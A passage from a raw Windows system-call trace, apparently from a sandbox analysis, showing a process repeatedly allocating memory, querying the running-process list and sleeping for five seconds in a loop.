AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0145.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0145.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0145.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0145.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0145.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.000] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0146.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0146.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0146.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0146.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0146.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0146.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.366] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0146.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0146.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0146.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0146.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0146.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0146.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.574] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0146.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0146.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0146.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0146.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0146.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0146.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.820] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0146.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0146.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0146.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0146.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0146.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0147.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.024] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0147.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0147.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0147.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0147.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0147.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0147.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.420] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0147.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0147.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0147.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0147.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0147.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0147.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.796] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0147.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0147.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0147.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0147.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0147.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0147.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.970] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0147.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0147.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0147.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0147.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0147.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0148.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.104] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0148.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0148.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0148.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0148.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0148.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0148.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.235] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0148.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0148.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0148.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0148.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0148.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0148.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.529] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0148.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0148.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0148.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0148.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0148.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0148.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.832] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0148.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0148.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0148.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0148.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0148.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0148.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.998] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0149.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0149.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0149.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0149.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0149.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0149.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.144] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0149.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0149.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0149.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0149.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0149.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0149.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.346] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0149.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0149.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0149.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0149.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0149.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0149.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.846] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0149.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0149.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0149.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0149.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0149.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0149.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.999] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0150.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0150.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0150.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0150.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0150.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0150.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.248] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0150.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0150.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0150.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0150.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0150.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0150.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.570] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0150.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0150.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0150.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0150.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0150.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0150.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.954] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0150.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0150.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0150.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0150.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0150.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0151.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.167] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0151.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0151.171] NtQuerySystemInformation (in: 